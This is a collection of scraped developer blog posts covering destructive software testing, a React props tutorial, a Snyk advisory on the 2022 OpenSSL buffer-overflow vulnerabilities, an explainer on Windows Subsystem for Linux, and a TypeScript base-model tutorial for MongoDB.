Destructive testing is a discipline of systems engineering that checks the robustness of an application by deliberately trying to make its code fail. Destructive testing examines unpredictable user behavior within the software, which helps uncover failure points that average usage does not encounter. This involves special inspections carried out under stressful conditions until the software fails.
A destructive testing process involves introducing known flaws to the software and observing the error detection rate. The testing can be performed without knowledge of the original software requirements and usually goes through the following steps:
1. The **Client** sends a copy of the application and user requirements to the initial testing team
2. **Testing team** analyzes and provides the application’s minimum requirements to the security and quality analyst
3. **Security analyst** establishes the application’s function boundaries and develops the software’s usability limits.
4. **Security testers** then test the application within established boundaries and record the test workflows, errors and exceptions.
5. The **testing team** also shares the defect directory with the client/development team.
6. The testing cycle is repeated as the **client** requires or as defined in business requirements.
### Strategies for Destructive Software Testing
Some methods of performing destructive application testing include:
#### Failure point analysis
This is a method of inspection that reviews and examines every processing path to determine what can fail at different points of the application configuration. Failure point analysis involves three stages, initial service testing, the identification of failure modes, and the analysis of each flaw's effects, to identify the application code sections that require change.
#### Peer review
The application is checked by a fellow developer/tester unfamiliar with the product features. This form of software testing helps developers uncover defects that are not visible to them while building the application code.
#### Exploratory testing
A type of testing where test cases are established on the fly to discover, investigate and remediate software flaws. Exploratory testing emphasizes learning and adaptability while following a session-based test management cycle. The testing mechanism is considered perfect as an initial service testing technique for a team with experienced testers.
#### Testing with invalid inputs
A security tester supplies the software with improper data in this testing technique, such as malformed inputs and wrong processes. As part of the analysis, testers analyze if the invalid test data is rejected and handled appropriately by the software.
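As a sketch of this technique, a destructive test feeds a handler deliberately malformed data and asserts that every invalid input is rejected rather than silently accepted. The `parse_age` function below is a hypothetical stand-in for the system under test:

```python
def parse_age(raw):
    """Hypothetical input handler: accept only integer ages in 0-130."""
    try:
        age = int(raw)
    except (TypeError, ValueError):
        raise ValueError("age must be a number")
    if not 0 <= age <= 130:
        raise ValueError("age out of range")
    return age

# Destructive checks: every invalid input must be rejected, never accepted.
for bad in ["abc", "", None, "-5", "999"]:
    try:
        parse_age(bad)
        raise AssertionError(f"invalid input accepted: {bad!r}")
    except ValueError:
        pass  # rejected as expected
print("all invalid inputs rejected")
```

The test passes only when the handler rejects malformed and out-of-range data in a controlled way, rather than crashing or accepting it.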
### Types and Examples of Destructive Testing
Quality analysts can perform destructive testing through several techniques, including:
#### Regression testing
Regression tests are typically performed to assess if recent updates, bug fixes, or the introduction of new features do not break the application.
The code snippet below shows a regression test system for a Python program. The test runs a CLI program with a set of input files and then compares the output of each test iteration with the results of a previous test:
```
#!/usr/bin/env python3
import os, sys
from stat import ST_SIZE
from glob import glob
from os.path import exists
from time import time, ctime

print('RegTest start.')
print('user:', os.environ.get('USER'))
print('path:', os.getcwd())
print('time:', ctime(time()), '\n')

program = sys.argv[1]
testdir = sys.argv[2]

for test in glob(testdir + '/*.in'):
    if not exists('%s.out' % test):
        # No previous output: generate the baseline for this test case.
        os.system('%s < %s > %s.out 2>&1' % (program, test, test))
        print('GENERATED:', test)
    else:
        # Keep the old output as a backup, rerun the program, and diff the two.
        os.rename(test + '.out', test + '.out.bkp')
        os.system('%s < %s > %s.out 2>&1' % (program, test, test))
        os.system('diff %s.out %s.out.bkp > %s.diffs' % ((test,) * 3))
        if os.stat(test + '.diffs')[ST_SIZE] == 0:
            print('PASSED:', test)
            os.remove(test + '.diffs')
        else:
            print('FAILED:', test, '(see %s.diffs)' % test)

print('RegTest done:', ctime(time()))
Assuming we have an executable program called ***darwin*** and a directory named ***test1*** containing the `.in` input files, a typical test run would look similar to:
```
% regtest.py darwin test1
RegTest start.
user: mark
path: /home/mark/stuff/python/testing
time: Mon Feb 26 21:13:20 1996

FAILED: test1/t1.in (see test1/t1.in.diffs)
PASSED: test1/t2.in
FAILED: test1/t3.in (see test1/t3.in.diffs)
RegTest done: Mon Feb 26 21:13:27 1996
```
Here, ***darwin*** is run three times, once per input file (***test1/t1.in***, ***test1/t2.in***, and ***test1/t3.in***
#### Boundary value testing
Boundary values denote the upper and lower limit of a variable. Boundary value testing helps analyze whether the software generates the correct output depending on the input value supplied.
Assume a [web application requires a password](https://crashtest-security.com/password-attack/) whose length is between 8 and 15 characters long. In such a case, the valid test cases can contain passwords with lengths of 8,9,10,11,12,13,14, and 15 characters. While all other password lengths will be marked invalid, the invalid test cases can be closer to the boundaries to test the application logic, such as 16-24 character and 0-7 character passwords.
The code snippet for a Python program ***(passValue.py)*** to test whether the supplied password is within the accepted values would look similar to:
```
userPass = input("Enter your Password: ")
passValue = len(userPass)
maxValue = 15
minValue = 8
if passValue > maxValue:
    print("Password too long")
elif passValue < minValue:
    print("Password too short")
else:
    print("Login successful")
```
The program accepts a password string and stores it as ***userPass***. The code then measures the length of the supplied password and saves it as ***passValue***. The program then compares the password length with the upper limit ***(maxValue)*** and the lower limit ***(minValue)***. As part of a destructive testing mechanism, the test involves supplying the application with passwords whose length falls outside the specified boundaries. Ideally, the application should reject an out-of-range password by printing a warning as soon as the user attempts to log in, before the input is processed any further.
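Under these assumptions, the boundary cases for ***passValue.py*** can be captured as a small set of assertions. The `check_password` helper below is a hypothetical refactor that wraps the same length check in a function so it can be tested programmatically:

```python
# Hypothetical helper: the same length check as passValue.py, wrapped in a
# function so the boundary values can be asserted programmatically.
def check_password(password, min_value=8, max_value=15):
    length = len(password)
    if length > max_value:
        return "Password too long"
    if length < min_value:
        return "Password too short"
    return "Login successful"

# Boundary value cases: just inside and just outside each limit.
assert check_password("a" * 7) == "Password too short"   # below the lower bound
assert check_password("a" * 8) == "Login successful"     # lower bound
assert check_password("a" * 15) == "Login successful"    # upper bound
assert check_password("a" * 16) == "Password too long"   # above the upper bound
```

Testing one value on each side of every boundary is usually enough to catch off-by-one mistakes such as `>=` written where `>` was intended.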
## What is Non-destructive Testing in Application Development?
Contrary to destructive testing, the non-destructive testing technique involves interacting with the software using expected actions on the application. These tests allow security analysts to assess the software without damaging the application’s functionality. As such, the primary purpose of non-destructive testing is to verify if the system behaves as intended on receiving valid data inputs.
### Non-destructive Testing – When to Use
A non-destructive testing technique is primarily used with the intended flow of an application and forms the basis of initial testing to verify if the software meets business requirements. Test results of non-destructive testing help to identify flaws in functionality but not design while verifying if the software works fine when testers engage with the program appropriately.
Non-destructive testing uses precise values and test cases to follow the expected application flows and produce results. This test is recommended to be carried out at the onset of an SDLC to verify that only one happy path exists while eliminating all alternative scenarios that can produce a valid result.
A non-destructive testing approach offers cost savings, efficiency, accuracy, and application security since it allows the software to survive the test unharmed. The testing mechanism can also be performed on all software components since it does not impact the design or functionality.
## Destructive vs. Non-destructive Testing – Quick Comparison
The table below compares destructive and non-destructive testing techniques:
| Destructive Testing | Non-destructive Testing |
|---------------------|-------------------------|
| Tests for defects in design | Inspects flaws in functionality |
| Can be performed without knowledge of business requirements | Verifies application functionality against acceptance criteria and business requirements |
| Designed to break the software by supplying malformed inputs to identify points of weakness | Uses positive paths to engage the application without impacting the source code |
## Automated Security Testing with Crashtest Security
Software testing is an interdisciplinary field of software engineering that uses multiple techniques to ensure an application is defect-free. Destructive testing involves breaking the application with malformed input or an unexpected user workflow to examine unpredictable behavior. Non-destructive testing, on the other hand, involves engaging the software through the correct application workflow, allowing professionals to inspect the software without damaging it.
Modern deployments rely on multiple automated testing processes to ensure the detection and mitigation of security flaws. Through a suite of different vulnerability scanners, **Crashtest Security** helps automate comprehensive testing of an application stack to save time on vulnerability detection and remediation.
To know more about how Crashtest Security can help reduce risk exposure and mitigate critical security vulnerabilities, [try a free, 14-day demo today](https://crashtest.cloud/registration?utm_campaign=blog_reg&_ga=2.35332833.1981229621.1667295078-850523454.1667295078&_gl=1*g5960k*_ga*ODUwNTIzNDU0LjE2NjcyOTUwNzg.*_ga_3YDVXJ8625*MTY2NzM5NDc2My4xMS4xLjE2NjczOTczOTkuMzkuMC4w).
*This article has already been published on https://crashtest-security.com/non-destructive-testing/ and has been authorized by Crashtest Security for a republish.*
| sudip_sg | |
1,240,734 | 03.01 - State & Props - Send counter data to child component (class components) | App preview: Project files: src/App.js import React from "react"; import './App.css'; import... | 20,220 | 2022-11-04T22:29:06 | https://dev.to/adriangheo/0301-state-props-send-counter-data-to-child-component-class-components-37g1 | webdev, javascript, react, tutorial | App preview:

Project files:

<hr/>
src/App.js
```react
import React from "react";
import './App.css';
import ParentComponent from "./components/ParentComponent";
class App extends React.Component{
render(){
return(
<div className="App">
<h1>App.js</h1>
<ParentComponent/>
</div>
)
}
}
export default App;
```
<hr/>
src/App.css
```css
.App{
background-color: lightskyblue;
padding: 15px 10px;
}
h1, h2, h3{
margin-top: 0px;
margin-bottom: 6px;
padding-top: 0px;
padding-bottom: 0px;
}
```
<hr/>
<hr/>
src/components/ParentComponent.jsx
```react
import React from "react";
import ChildComponent from "./ChildComponent"
import "./ParentComponent.css"
class ParentComponent extends React.Component{
constructor(){
super();
this.state = {
count: 0
}
}
handleClick = () => {
this.setState((prevState)=>({count: prevState.count+1}))
}
render(){
return(
<div className="ParentComponent">
<h2>ParentComponent.jsx</h2>
<button onClick={()=>{this.handleClick()}}>Click me</button>
<br/><br/>
<ChildComponent count={this.state.count}/>
</div>
)
}
}
export default ParentComponent;
```
<hr/>
src/components/ParentComponent.css
```css
.ParentComponent{
background-color: lightcoral;
padding: 15px 10px;
}
```
<hr/>
<hr/>
src/components/ChildComponent.jsx
```react
import React from "react";
import "./ChildComponent.css"
class ChildComponent extends React.Component{
render(){
const {count} = this.props;
return(
<div className="ChildComponent">
<h3>ChildComponent.jsx</h3>
<p>The value of count is {count}.</p>
</div>
)
}
}
export default ChildComponent;
```
<hr/>
src/components/ChildComponent.css
```css
.ChildComponent {
background-color: lightgreen;
padding: 15px 10px;
}
```
| adriangheo |
1,241,010 | Update: OpenSSL high severity vulnerabilities | OpenSSL has released two high severity vulnerabilities — CVE-2022-3602 and CVE-2022-3786 — related to... | 0 | 2022-11-14T15:34:21 | https://snyk.io/blog/openssl-high-severity-vulnerabilities/ | applicationsecurity, engineering, opensource, vulnerabilities | ---
title: Update: OpenSSL high severity vulnerabilities
published: true
date: 2022-11-02 19:59:03 UTC
tags: ApplicationSecurity,Engineering,OpenSource,Vulnerabilities
canonical_url: https://snyk.io/blog/openssl-high-severity-vulnerabilities/
---
OpenSSL has disclosed two high severity vulnerabilities, CVE-2022-3602 and CVE-2022-3786, related to buffer overruns. OpenSSL initially rated CVE-2022-3602 as critical, but upon further investigation, it was reduced to high severity.
## What is a Buffer Overrun?
A buffer overrun/overflow is a type of runtime issue that allows a program to write past the end of a buffer or array and corrupt nearby memory, hence the name overflow. Unlike most deterministic bugs, a buffer overflow does not surface on every program execution; specific conditions, such as unexpected user input, are required to trigger the vulnerability.
**Both high severity vulnerabilities can be triggered in name constraint checking during X.509 certificate verification.**
- X.509 Email Address 4-byte Buffer Overflow (CVE-2022-3602)
- X.509 Email Address Variable Length Buffer Overflow (CVE-2022-3786)
The vulnerability can be triggered in a TLS client by connecting to a rogue server. It could also be triggered on a TLS server if a malicious client joins when the server requests client authentication.
OpenSSL version 3.0.7 was released to patch both issues in the open source SSL/TLS toolkit. Any OpenSSL 3.0 program that checks X.509 certificates obtained from untrusted sources should be regarded as insecure and exploitable by attackers until it is upgraded.
TLS client authentication should be disabled on clients and servers until the upgrade has been applied.
### Affected Versions
OpenSSL versions 3.0.0 to 3.0.6 are vulnerable to this issue.
### Unaffected versions
- 1.1.1
- 1.1.0
- 1.0.2
- 1.0.1
- 1.0.0
- 0.9.x
- fips
### Impact
- Denial of Service
- Remote Code Execution
## How can Snyk Help?
### Snyk Open Source
Now that the vulnerability details have been made available, Snyk Open Source projects will flag the [vulnerability](https://security.snyk.io/vuln?search=CVE-2022-3602) in their next retest. For projects configured for daily testing, that will happen within the next 24 hours. **Clients can, of course, manually trigger retests on critical projects to see these results sooner.**
You can also scan open source code from the Snyk CLI using the `snyk test` command.
### Snyk Container
When an advisory like the OpenSSL CVE is issued, each Linux distro maintainer then has to triage and issue their own advisory. It’s this distro advisory that triggers the detections in Snyk Container. This means there will likely be some lag between the OpenSSL advisory and the first Snyk Container detections, based on how quickly the Linux distro maintainers release their advisories. [Learn more about how this process works with our post on simplifying container security](https://snyk.io/blog/simplifying-container-security-snyk-expertise/).
Once that happens, you’ll see these detections flagged in Snyk Container test results. For both Snyk Open Source and Snyk Container, you’ll see results in reporting up to 9 hours after the above conditions are met due to existing data latency. This latency may be shorter when using the beta reporting to view issues.
## Recommendations
- OpenSSL 3.0 users should upgrade to OpenSSL 3.0.7.
- Stack overflow protections
## Update on the data for Ubuntu advisories in Snyk VulnDB
- [https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092607](https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092607) ([CVE-2022-3602](https://www.cve.org/CVERecord?id=CVE-2022-3602))
- [https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092568](https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092568) ([CVE-2022-3786](https://www.cve.org/CVERecord?id=CVE-2022-3786))
- [https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092584](https://security.snyk.io/vuln/SNYK-UBUNTU2210-OPENSSL-3092584) ([CVE-2022-3786](https://www.cve.org/CVERecord?id=CVE-2022-3786))
- [https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092591](https://security.snyk.io/vuln/SNYK-UBUNTU2204-OPENSSL-3092591) ([CVE-2022-3602](https://www.cve.org/CVERecord?id=CVE-2022-3602))
## References
- [https://www.openssl.org/news/vulnerabilities.html](https://www.openssl.org/news/vulnerabilities.html)
- [https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3090874](https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3090874) (CVE-2022-3602) [https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3092519](https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3092519) (CVE-2022-3786)
- [https://cve.org/CVERecord?id=CVE-2022-3786](https://cve.org/CVERecord?id=CVE-2022-3786)
- [https://cve.org/CVERecord?id=CVE-2022-3602](https://cve.org/CVERecord?id=CVE-2022-3602)
- [https://www.openssl.org/news/secadv/20221101.txt](https://www.openssl.org/news/secadv/20221101.txt) [https://mta.openssl.org/pipermail/openssl-announce/2022-November/000241.html](https://mta.openssl.org/pipermail/openssl-announce/2022-November/000241.html)
- [https://distrowatch.com/search.php?pkg=openssl&relation=similar&pkgver=3.&distrorange=InAny#pkgsearch](https://distrowatch.com/search.php?pkg=openssl&relation=similar&pkgver=3.&distrorange=InAny#pkgsearch)
- [https://nodejs.org/en/blog/vulnerability/november-2022-security-releases/](https://nodejs.org/en/blog/vulnerability/november-2022-security-releases/)
## Protect your applications for free
Create a Snyk account today to find and fix vulnerabilities in your code, dependencies, containers, and cloud infrastructure.
[Sign up for free](https://app.snyk.io/login?cta=sign-up&loc=body&page=update-openssl-high-severity-vulnerabilities)
<!-- /.block --> | snyk_sec |
1,241,092 | Pengertian Dasar Windows Subsystem for Linux (WSL), Pengguna Harus Tahu | Windows dan Linux adalah sistem operasi yang paling banyak digunakan di dunia. Namun keduanya tidak... | 0 | 2022-11-03T02:14:48 | https://dev.to/rino/pengertian-dasar-windows-subsystem-for-linux-wsl-pengguna-harus-tahu-1ep | linux | Windows dan Linux adalah sistem operasi yang paling banyak digunakan di dunia. Namun keduanya tidak bisa lebih berbeda. Windows adalah produk komersial dari Microsoft, salah satu perusahaan perangkat lunak terbesar di dunia. Sebaliknya, Linux, sebagai <strong>Free and open-source software (FOSS)</strong>, merupakan upaya bersama oleh ribuan sukarelawan.
Windows terutama digunakan di lingkungan pribadi dan bisnis. Linux berjalan di server dan komputer profesional dan individu pribadi. Banyak pengembang menggunakan Linux. Selain itu, sistem operasi terbuka merupakan dasar dari sistem operasi seluler Android.
Windows Subsystem for Linux (WSL) memungkinkan pengguna Windows mengakses ke ribuan paket aplikasi dan tool open source yang tersedia secara gratis. Sebelumnya, ini memerlukan pengaturan mesin virtual atau me-reboot komputer di lingkungan Linux dual-boot khusus. Namun, dengan WSL, yang diperlukan hanyalah beberapa klikb saja.
<h2>What is Windows Subsystem for Linux?</h2>
Windows Subsystem for Linux is a compatibility layer that allows native Linux programs to be run directly from the Windows command line. Specifically, WSL can execute 64-bit Linux binaries in the standard Executable and Linkable Format (ELF).
Windows Subsystem for Linux has been available since Windows 10, but Microsoft's interest in making it easier for Windows users to work with Linux tools from a familiar desktop environment goes back much further. WSL grew out of the "Microsoft Windows Services for UNIX" (SFU/Interix) project, which in turn was a further development of the "POSIX subsystem" already integrated into Windows NT. This development continues with Windows Subsystem for Linux 2 (WSL2).
Before WSL was released, users had to combine the best aspects of the Windows and Linux worlds themselves. In principle, there were two ways to run Linux programs on Windows:
<ol>
<li><strong>Using a virtual machine.</strong> A complete Linux installation runs as a virtual computer under Windows. This approach is user-friendly and allows full use of any Linux application, but it requires considerable hardware resources. In addition, data exchange between programs running on the two operating systems is limited.</li>
<li><strong>Using the Cygwin Linux runtime environment.</strong> It is installed under Windows and enables the use of many popular Linux programs. Exchange between Windows and Linux programs is possible with Cygwin, but only to a certain extent.</li>
</ol>
In addition, users can set up Linux alongside an existing Windows installation. However, this setup, known as <a href="https://mobiledailytekno.blogspot.com/2022/11/cara-membuat-dual-boot-di-windows-10.html">dual boot</a>, requires restarting the computer to switch to the respective operating system. Exchanging data between programs running on Windows and Linux is therefore not possible with this option.
Windows Subsystem for Linux does not require a virtual machine and therefore performs well. However, it does not provide a complete Linux kernel, so not all applications are supported.
In particular, WSL itself does not allow running Linux programs with a graphical user interface (GUI). There are workarounds for this too, but they require additional installation and configuration steps.
<h2>What are the requirements for using WSL?</h2>
In fact, no special system requirements are needed to use Windows Subsystem for Linux. Your computer only needs an x64 or ARM processor, which applies to almost all modern systems. In addition, 64-bit Windows 10 version 1709 or higher is required.
If you are not sure which edition and version of Windows you are using, you can check with the following steps:
<ul>
<li>Press the Windows logo key + [R], type "winver" in the text box that appears, and press [Enter].</li>
<li>Alternatively, click Start > Settings > System > About > Windows specifications and read the values there.</li>
</ul>
<h2>How do you install Windows Subsystem for Linux?</h2>
The process of enabling Windows Subsystem for Linux on a system is very simple. We will show the process here for home users. Follow these steps:
<ol>
<li>Click Start > Control Panel > Programs > Programs and Features > Turn Windows features on or off.</li>
<li>Check the box next to "Windows Subsystem for Linux".</li>
<li>Restart the computer.</li>
<li>Open the Microsoft Store and search for "Linux". You will be presented with a selection of the available Linux distributions.</li>
<li>Click the desired Linux distribution, then click Install. If you are not sure which distribution is right for you, we recommend installing "Ubuntu Linux".</li>
<li>Once the installation is complete, click "Launch".</li>
<li>In the window that appears, packages are downloaded and unpacked on first launch. This may take a few minutes. Finally, you will be asked to set a username and password for the new Linux installation.</li>
</ol>
<strong>Note:</strong>
You can run multiple Linux distributions in parallel with WSL. In that case, create a separate user account for each distribution.
As an alternative to the first two steps, you can also use the following PowerShell command to enable Windows Subsystem for Linux. Please note that the command must be run as administrator. After it has executed, restart the computer and follow the instructions above from step 4.
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux</code></pre>
<h2>Some WSL Commands</h2>
What are the first steps after enabling WSL and installing a Linux distribution? That depends on what you intend to use WSL for. Web developers usually need a different set of applications than app developers. Below we summarize a few frequently needed WSL commands.
<h3>Display and control installed WSL distributions</h3>
The Windows tool wsl.exe is used on the command line to control the installed Linux distributions. Open a command prompt and enter the following command to display the available options of the wsl command:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">wsl --help</code></pre>
<h3>Display Linux distributions</h3>
You can use Windows Subsystem for Linux to install and use multiple Linux distributions. Run the following command on the command line to get an overview of the installed distributions:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">wsl --list --verbose</code></pre>
<h3>Start the default Linux distribution</h3>
To start the default Linux distribution, it is enough to run the wsl command without any further parameters:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">wsl</code></pre>
After that, you are logged in as a Linux user and have direct access to the familiar Linux commands.
<h3>Update the Linux distribution</h3>
As soon as you log in to the Linux distribution for the first time, update the installed software packages using the following command:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">sudo apt update && sudo apt upgrade</code></pre>
Since this is a system-wide operation at the Linux level, the command starts with "sudo". You will then have to enter the password you set during the installation of the Linux distribution.
<h3>Install Git</h3>
Git is the most widely used tool for versioning code projects. To install Git in a Linux distribution, use the following command:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">sudo apt install git</code></pre>
<h3>Use Linux tools from Windows</h3>
You have seen how to log in to a Linux distribution using the wsl tool and then use Linux commands. There is also an alternative method: you can <strong>run Linux commands directly from the Windows shell</strong>. This can be useful, for example, for using Linux commands in PowerShell scripts. Simply append the Linux command to the wsl tool call:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed"># use Linux-Command `ls` to output contents of the current directory
wsl ls -la</code></pre>
<h3>Use Windows tools from the Linux command prompt</h3>
As you have seen, you can use WSL to run Linux commands directly from the Windows command line or from PowerShell. This also works the other way around: you can use Windows command-line tools at the Linux command prompt or in Linux scripts. The command-line tools can be combined just like regular Linux commands.
Here we use the Windows tool <strong>ipconfig.exe</strong> to display network information, combined with the Linux tool grep to filter for the IPv4 results and cut to strip the field label:
<pre class="line-numbers language-mixed" data-language="mixed"><code class="language-mixed">ipconfig.exe | grep IPv4 | cut -d: -f2</code></pre>
<h2>How to Enable Windows Subsystem for Linux</h2>
WSL lets you use Linux commands on the command line and in scripts. In this way, Windows and Linux tools can be connected, which makes WSL highly relevant for developers.
Web development and open source programming in particular become easier by enabling WSL. With Windows Subsystem for Linux enabled, you can:
<ol>
<li>Install one or more Linux distributions from the Microsoft Store.</li>
<li>Use popular command-line tools such as "grep", "sed" and "awk".</li>
<li>Run other ELF-64 binaries.</li>
<li>Run scripts for the Bash shell and other shell environments.</li>
<li>Use terminal-based applications such as "vim", "emacs", and "tmux".</li>
<li>Use programming languages and related tooling, for example, NodeJS, Javascript, Python, Ruby, C/C++, C# & F#, Rust, Go, etc.</li>
<li>Run Linux services on your machine, for example SSHD, MySQL, Apache, lighttpd, MongoDB, <a href="https://m3dcam.live-website.com/instal-postgresql-di-windows-server-2016/">PostgreSQL</a>, etc.</li>
<li>Install additional software using the Linux distribution's package manager.</li>
<li>Invoke Windows applications using a Unix-like command line.</li>
<li>Run Linux applications on Windows.</li>
</ol>
That's it for this article on WSL, the Windows Subsystem for Linux. We hope you found it useful. | rino |
1,241,333 | 31-Nodejs Course 2023: Database Models: Create Base Model | So we got to know about database models in the previous article, now let's create a base model that... | 20,274 | 2022-11-03T10:59:44 | https://dev.to/hassanzohdy/31-nodejs-course-2023-database-models-create-base-model-19pd | node, typescript, mongodb, fastify | ---
title: 31-Nodejs Course 2023: Database Models: Create Base Model
published: true
description:
series: Nodejs Course 2023
tags: nodejs, typescript, mongodb, fastify
#cover_image:
# Use a ratio of 100:42 for best results.
---
So we got to know about database models in the previous article, now let's create a base model that we'll use to create other models.
## Model Structure
Before we get started, let's illustrate how the model structure works. We have four main parts:
- Static Variables: These variables are accessed directly on the class without creating an instance of the model, for example, the collection name.
- Static Methods: These methods are called directly on the class without creating an instance of the model, for example, the `find` method.
- Instance Variables: These variables are accessed on an instance of the model, for example, the `name` variable.
- Instance Methods: These methods are called on an instance of the model, for example, the `save` method.
Static variables will mainly hold the model's metadata, information such as the collection name, the initial id value, and so on.
Static methods will be used for quick access and for operations that are not tied to a specific instance of the model, for example, the `find` method.
## Base Model
Go to the `src/core/database` folder, create a `model` folder inside it, then create a `model.ts` file in that folder.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
}
```
Nothing fancy here, just a base model class that we'll extend in other models.
We're making it abstract because we don't want to use it directly; it will serve only as a base class for other models to inherit from.
The collection name will be a static property that we'll override in the child classes so we can access the collection name from the model class directly without creating an instance of it.
You might wonder why we created a file called `model.ts` inside the `model` directory rather than `index.ts`. That's because we're going to create more files inside the `model` directory, so we'll reserve the `index.ts` file for exports only.
Now let's create the index file and export the base model from it.
```ts
// src/core/database/model/index.ts
export { default as Model } from './model';
```
Then go to the `database/index.ts` file and re-export everything from `model/index.ts`.
```ts
// src/core/database/index.ts
export * from './model';
```
This will allow us to access the `Model` class by importing it like this:
```ts
import { Model } from 'core/database';
```
## Users Model
Now let's create a new file called `user.ts` in `src/app/users/models` directory.
```ts
// src/app/users/models/user.ts
import { Model } from 'core/database';
export default class User extends Model {
/**
* Collection Name
*/
public static collectionName = "users";
}
```
Now we have a base model and a user model that extends it, with the collection name set on the user model.
Pretty easy, nothing fancy here, but these are still just empty files without a soul (no database yet).
We can now get the collection name directly like this:
```ts
import User from 'app/users/models/user';
console.log(User.collectionName); // users
```
Let's create its soul.
## Database Connection
Heading back to our base model, let's define a database connection property.
```ts
// src/core/database/model/model.ts
import connection, { Connection } from './../connection';
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
}
```
We'll keep a reference to our own connection so we can access it when needed, and of course we can reach the database handler directly through it.
## Collection Query
Now let's define a collection method to return the collection query handler.
```ts
// src/core/database/model/model.ts
import { Collection } from "mongodb";
import connection, { Connection } from './../connection';
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
/**
* Get Collection query
*/
public static query(): Collection {
return this.connection.database.collection(this.collectionName);
}
}
```
In JavaScript, static properties can be accessed through `this` inside static methods, so `this.connection` and `this.collectionName` refer to the values defined on the class itself.
We also need to assure TypeScript that the connection's `database` property always exists; otherwise the compiler will complain that it is possibly `undefined`.
```ts
// src/core/database/connection.ts
/**
* Database instance
*/
// 👇🏻Replace the ?: with !:
public database!: Database;
```
So far so good. Now that we're done with the static methods, let's implement the non-static ones we need.
At this point, we can now access the users collection like this:
```ts
import User from 'app/users/models/user';
// get the collection query
const usersCollection = User.query();
await usersCollection.find().toArray();
```
## Accessing Child Static Property From Parent Class
Inside the model itself, once we create a new instance (object) of it, we need to access the model's collection for internal operations, such as saving the user's data to the database, so we need to reach the `query` method of the child class.
From an instance method defined on the parent class, we can't reference the child class's static members directly, so we need a small trick to access them.
That trick is the `this.constructor` property, which points at the class the instance was created from.
```ts
// src/core/database/model/model.ts
import connection, { Connection } from './../connection';
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.constructor.collectionName;
}
}
```
But TypeScript will start complaining because it doesn't know that the `constructor` property refers to the `Model` class.
To fix this, we'll use a type assertion with the `typeof` keyword to tell TypeScript that the `constructor` property is the `Model` class.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
// ...
/**
* Get Collection Name
*/
public getCollectionName(): string {
return (this.constructor as typeof Model).collectionName;
}
}
```
We can wrap this in a protected method so we can reuse it in other methods by passing only the name of the static property we need.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
// ...
/**
* Get Static Property
*/
protected getStaticProperty<T>(property: keyof typeof Model): T {
return (this.constructor as any)[property];
}
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.getStaticProperty('collectionName');
}
}
```
The `keyof typeof Model` type tells TypeScript that the `property` parameter must be one of the `Model` class's static keys, so we get autocompletion for the static property names.
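To see the pattern in isolation, here is a self-contained sketch (the class names `Base` and `Child` are made up for this demo) showing that `this.constructor` resolves to the class the instance was actually created from:

```typescript
class Base {
  public static label = "base";

  // `keyof typeof Base` restricts `property` to Base's static keys,
  // so we get autocompletion and a compile-time check on the name.
  protected getStaticProperty<T>(property: keyof typeof Base): T {
    return (this.constructor as any)[property];
  }

  public getLabel(): string {
    return this.getStaticProperty("label");
  }
}

class Child extends Base {
  // overriding the static member is all a child has to do
  public static label = "child";
}

console.log(new Base().getLabel());  // "base"
console.log(new Child().getLabel()); // "child", resolved via this.constructor
```

This is exactly why `User` only needs to override `collectionName`: every inherited instance method looks the static value up through `this.constructor`.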
## Getting Connection, Database and Collection Query
Now we can use the `getStaticProperty` method to get the connection, database and collection query.
```ts
// src/core/database/model/model.ts
export default abstract class Model {
// ...
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.getStaticProperty("collectionName");
}
/**
* Get database connection
*/
public getConnection(): Connection {
return this.getStaticProperty("connection");
}
/**
* Get database instance
*/
public getDatabase(): Database {
return this.getConnection().database;
}
/**
* Get Collection Query
*/
public getQuery(): Collection {
// `query` is a static method, so call it on the child class constructor
return (this.constructor as typeof Model).query();
}
}
```
So our final model class will look like this:
```ts
import { Collection } from "mongodb";
import { Database } from "../database";
import connection, { Connection } from "./../connection";
export default abstract class Model {
/**
* Collection Name
*/
public static collectionName = "";
/**
* Database Connection
*/
public static connection: Connection = connection;
/**
* Get Collection query
*/
public static query(): Collection {
return this.connection.database.collection(this.collectionName);
}
/**
* Get Collection Name
*/
public getCollectionName(): string {
return this.getStaticProperty<string>("collectionName");
}
/**
* Get database connection
*/
public getConnection(): Connection {
return this.getStaticProperty<Connection>("connection");
}
/**
* Get database instance
*/
public getDatabase(): Database {
return this.getConnection().database;
}
/**
* Get Collection Query
*/
public getQuery(): Collection {
// `query` is a static method, so call it on the child class constructor
return (this.constructor as typeof Model).query();
}
/**
* Get Static Property
*/
protected getStaticProperty<T>(property: keyof typeof Model): T {
return (this.constructor as any)[property];
}
}
```
Let's give it a try:
```ts
import User from 'app/users/models/user';
// create a new model instance
const user = new User();
// get the collection name
user.getCollectionName();
// get the database connection
user.getConnection();
// get the database instance
user.getDatabase();
// get the collection query
user.getQuery();
```
We can split it into 4 parts:
